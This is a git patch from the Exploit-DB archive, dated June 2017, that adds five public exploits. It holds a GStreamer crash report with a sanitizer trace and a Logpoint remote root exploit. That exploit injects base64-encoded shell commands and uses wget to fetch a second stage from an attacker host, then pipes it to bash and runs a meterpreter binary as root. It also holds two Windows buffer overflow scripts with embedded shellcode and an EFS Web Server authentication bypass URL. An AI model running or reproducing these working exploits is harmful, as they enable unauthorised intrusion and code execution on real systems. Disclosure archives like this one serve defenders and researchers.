From 117f75fdfcfe48faaebdcb252e0c5c113f96f387 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 13 Jun 2017 05:01:23 +0000
Subject: [PATCH] DB: 2017-06-13

5 new exploits

GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference
DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow
Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow
Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution
Easy File Sharing Web Server 7.2 - Authentication Bypass
---
 files.csv                          |  5 ++
 platforms/linux/dos/42162.txt      | 37 ++++++++++++++
 platforms/linux/remote/42158.py    | 62 +++++++++++++++++++++++
 platforms/windows/local/42160.py   | 78 +++++++++++++++++++++++++++++
 platforms/windows/local/42161.py   | 79 ++++++++++++++++++++++++++++++
 platforms/windows/remote/42159.txt | 68 +++++++++++++++++++++++++
 6 files changed, 329 insertions(+)
 create mode 100755 platforms/linux/dos/42162.txt
 create mode 100755 platforms/linux/remote/42158.py
 create mode 100755 platforms/windows/local/42160.py
 create mode 100755 platforms/windows/local/42161.py
 create mode 100755 platforms/windows/remote/42159.txt

diff --git a/files.csv b/files.csv
index 38f6cd37c..e652db820 100644
--- a/files.csv
+++ b/files.csv
@@ -5539,6 +5539,7 @@ id,file,description,date,author,platform,type,port
 42144,platforms/linux/dos/42144.py,"Mapscrn 2.03 - Local Buffer Overflow",2017-06-09,"Juan Sacco",linux,dos,0
 42147,platforms/linux/dos/42147.txt,"libcroco 0.6.12 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
 42148,platforms/linux/dos/42148.txt,"libquicktime 1.2.4 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
+42162,platforms/linux/dos/42162.txt,"GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference",2017-06-12,"Hanno Boeck",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9045,6 +9046,8 @@ id,file,description,date,author,platform,type,port
 42145,platforms/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local,0
 42146,platforms/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local,0
 42157,platforms/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,windows,local,0
+42160,platforms/windows/local/42160.py,"DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
+42161,platforms/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15586,6 +15589,8 @@ id,file,description,date,author,platform,type,port
 42134,platforms/python/remote/42134.rb,"DC/OS Marathon UI - Docker Exploit (Metasploit)",2017-06-07,Metasploit,python,remote,0
 42152,platforms/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",multiple,remote,0
 42155,platforms/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",windows,remote,0
+42158,platforms/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,linux,remote,0
+42159,platforms/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
diff --git a/platforms/linux/dos/42162.txt b/platforms/linux/dos/42162.txt
new file mode 100755
index 000000000..b9437a0ec
--- /dev/null
+++ b/platforms/linux/dos/42162.txt
@@ -0,0 +1,37 @@
+Source: https://bugzilla.gnome.org/show_bug.cgi?id=775120
+
+The attached file will cause a null pointer access and segfault in the mpegts parser. Current git code, found with afl.
+
+ASAN stack trace:
+=================================================================
+==32545==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe957185495 bp 0x60200002cf7a sp 0x7fe956e027a0 T2)
+==32545==The signal is caused by a WRITE memory access.
+==32545==Hint: address points to the zero page.
+    #0 0x7fe957185494 in _parse_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32
+    #1 0x7fe957184058 in __common_section_checks /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:166:9
+    #2 0x7fe95718522f in gst_mpegts_section_get_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:480:9
+    #3 0x7fe957438b9a in mpegts_base_apply_pat /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:942:20
+    #4 0x7fe957438b9a in mpegts_base_handle_psi /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1155
+    #5 0x7fe957437cd1 in mpegts_base_chain /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1424:11
+    #6 0x7fe9574341e7 in mpegts_base_loop /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1589:13
+    #7 0x7fe9644305c3 in gst_task_func /f/gstreamer/gstreamer/gst/gsttask.c:334:5
+    #8 0x7fe96362f867  (/usr/lib64/libglib-2.0.so.0+0x70867)
+    #9 0x7fe96362eed4  (/usr/lib64/libglib-2.0.so.0+0x6fed4)
+    #10 0x7fe9630ac443 in start_thread (/lib64/libpthread.so.0+0x7443)
+    #11 0x7fe962bdb92c in clone (/lib64/libc.so.6+0xe792c)
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32 in _parse_pat
+Thread T2 (tsdemux0:sink) created by T1 (typefind:sink) here:
+    #0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
+    #1 0x7fe96364cadf  (/usr/lib64/libglib-2.0.so.0+0x8dadf)
+
+Thread T1 (typefind:sink) created by T0 here:
+    #0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
+    #1 0x7fe96364cadf  (/usr/lib64/libglib-2.0.so.0+0x8dadf)
+
+==32545==ABORTING
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42162.zip
diff --git a/platforms/linux/remote/42158.py b/platforms/linux/remote/42158.py
new file mode 100755
index 000000000..7c7a0aa23
--- /dev/null
+++ b/platforms/linux/remote/42158.py
@@ -0,0 +1,62 @@
+# Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4
+# Date: 11/06/17
+# Exploit Author: agix
+# Vendor Homepage: https://www.logpoint.com
+# Version: logpoint < 5.6.4
+# Tested on: 5.6.2
+
+# Vendor contact 19/04
+# Exploit details sent to the vendor 24/04
+# Patch in test mode 05/05
+# Patch release to public 08/05
+
+
+# run python -m SimpleHTTPServer to serve second stage of the exploit in a file named e
+# to get root code execution this is the second stage e
+# wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met
+# it downloads a third stage executed as root
+
+import time
+import zmq
+import sys
+import json
+import random
+import string
+import base64
+
+ATTACKER_IP = '172.16.171.1'
+LOGPOINT_IP = '172.16.171.204'
+
+def crash():
+    context = zmq.Context()
+    sock = context.socket(zmq.DEALER)
+    sock.connect("tcp://%s:5504"%LOGPOINT_IP)
+    sock.send('crash')
+
+crash()
+time.sleep(1)
+
+context = zmq.Context()
+
+sock2 = context.socket(zmq.DEALER)
+sock2.connect("tcp://%s:5504"%LOGPOINT_IP)
+
+name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
+
+cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP)
+cmd2 = base64.b64encode('cat /tmp/e')
+
+exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2)
+
+tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
+print tosend
+sock2.send(tosend)
+print sock2.recv()
+
+time.sleep(30)
+
+# cleaning
+tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
+print tosend
+sock2.send(tosend)
+print sock2.recv()
\ No newline at end of file
diff --git a/platforms/windows/local/42160.py b/platforms/windows/local/42160.py
new file mode 100755
index 000000000..35d4f1f54
--- /dev/null
+++ b/platforms/windows/local/42160.py
@@ -0,0 +1,78 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title:  DiskBoss v8.0.16 - Local Buffer Overflow
+# Date: 11-06-2017
+# Exploit Author: @abatchy17 -- www.abatchy.com
+# Vulnerable Software: DiskBoss v8.0.16 (Freeware, Pro and Ultimate)
+# Vendor Homepage:    http://www.disksorter.com/    
+# Version: 8.0.16
+# Software Link:      http://www.diskboss.com/downloads.html (Freeware, Pro and Ultimate)
+# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
+#
+# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input Directory" and paste the content of exploit.txt
+#
+# Only difference between this one and 42157 is that EBX is used
+#
+#  Note: No typos!!11!
+#
+##############################################################################
+
+a = open("exploit.txt", "w")
+
+# Message=  0x65182c15 : jmp ebx | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\DiskBoss\bin\QtGui4.dll)
+jmpebx = "\x15\x2c\x18\x65" # Why JMP EBX? Buffer at ESP is split, bad!
+
+badchars = "\x0a\x0d\x2f"
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
+buf =  ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
+buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
+buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
+buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
+buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
+buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
+buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
+buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
+buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
+buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
+buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
+buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
+buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
+buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
+buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
+buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
+buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
+buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
+buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
+buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
+buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
+buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
+buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
+buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
+buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
+buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
+buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
+buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
+buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
+buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
+
+llamaleftovers = (
+    "\x53"  # push EBX
+    "\x58"  # pop EAX
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = EBX + 233, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
+    )
+
+junk = "\x53\x5b" * 119 + "\x53"
+
+data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4) + llamaleftovers + junk + buf
+
+a.write(data)
+a.close()
diff --git a/platforms/windows/local/42161.py b/platforms/windows/local/42161.py
new file mode 100755
index 000000000..2349ee00f
--- /dev/null
+++ b/platforms/windows/local/42161.py
@@ -0,0 +1,79 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title:        Sync Breeze v9.7.26 - Local Buffer Overflow
+# Date:                 11-06-2017
+# Exploit Author:       @abatchy17 -- www.abatchy.com
+# Vulnerable Software:  Sync Breeze v9.7.26 (Freeware, Pro and Ultimate)
+# Vendor Homepage:      http://www.syncbreeze.com   
+# Version:              9.7.26
+# Software Link:        http://www.syncbreeze.com/downloads.html (Freeware, Pro and Ultimate)
+# Tested On:            Windows XP SP3 (x86), Win7 SP1 (x86)
+#
+# To trigger the exploit:
+#   1. click "Add"
+#   2. enter any command name
+#   3. On new window, scroll down to "Exclude"
+#   4. Click "Add Exclude Directory"
+#   4. Paste text in exploit.txt into "Directory" field
+#
+##############################################################################
+
+a = open("exploit.txt", "w")
+
+# Message=  0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Sync Breeze\bin\QtGui4.dll)
+jmpesp = "\x4e\x21\x1f\x65"
+
+badchars = "\x0a\x0d" # And 0x80 to 0xff
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d"
+buf =  ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
+buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
+buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
+buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
+buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
+buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
+buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
+buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
+buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
+buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
+buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
+buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
+buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
+buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
+buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
+buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
+buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
+buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
+buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
+buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
+buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
+buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
+buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
+buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
+buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
+buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
+buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
+buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
+buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
+buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
+
+junk = "C" * (239)
+
+llamaleftovers = (
+    "\x54"  # push ESP
+    "\x58"  # pop EAX
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = old ESP + 0x100, shellcode generated should start exactly here as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
+    )
+
+data = "A"*4108 + jmpesp + llamaleftovers + junk + buf
+
+a.write(data)
+a.close()
diff --git a/platforms/windows/remote/42159.txt b/platforms/windows/remote/42159.txt
new file mode 100755
index 000000000..c8f44e11f
--- /dev/null
+++ b/platforms/windows/remote/42159.txt
@@ -0,0 +1,68 @@
+# Exploit Title: EFS Web Server 7.2 Authentication Bypass
+# Date: 11-06-2017
+# Software Link: http://www.sharing-file.com/efssetup.exe
+# Software Version : 7.2
+# Exploit Author: Touhid M.Shaikh
+# Contact: http://twitter.com/touhidshaikh22
+# Website: http://touhidshaikh.com/
+
+
+######## Description ########
+<!--
+    What is Easy File Sharing Web Server 7.2 ?
+    Easy File Sharing Web Server is a file sharing software that allows
+visitors to upload/download files easily through a Web Browser. It can help
+you share files with your friends and colleagues. They can download files
+from your computer or upload files from theirs.They will not be required to
+install this software or any other software because an internet browser is
+enough. Easy File Sharing Web Server also provides a Bulletin Board System
+(Forum). It allows remote users to post messages and files to the forum.
+The Secure Edition adds support for SSL encryption that helps protect
+businesses against site spoofing and data corruption.
+-->
+
+######## Video PoC and Article ########
+
+https://www.youtube.com/watch?v=XlTH7Fm1m1w
+http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/
+
+
+
+######## Attact Description  ########
+<!--
+
+ Note: No Need to Login...bcz this is auth bypass vulnerability .hehehe.
+
+==>START<==
+Any visitor..
+
+We can Bypass the Login Screen by just Change the URL and Browse the
+Drives.
+bingoo...
+-->
+
+######## Proof of Concept ########
+
+When we visit the EFS web server its prompt for login, now attacker just
+change url to below.
+Exploit....
+
+http://192.168.1.14/disk_c/
+
+in this case change drvie by just change /disk_c to /disk_<Drive latter>
+example. /disk_d , /disk_f etc
+
+=============================================
+NOTE :: ::
+Now We have Permission to View Drives and Folder and Download Files. in
+Diffrent Drives or folder.
+============================================
+
+ _____ ___  _   _ _   _ ___ ____
+|_   _/ _ \| | | | | | |_ _|  _ \
+  | || | | | | | | |_| || || | | |
+  | || |_| | |_| |  _  || || |_| |
+  |_| \___/ \___/|_| |_|___|____/
+
+Touhid Shaikh.......
+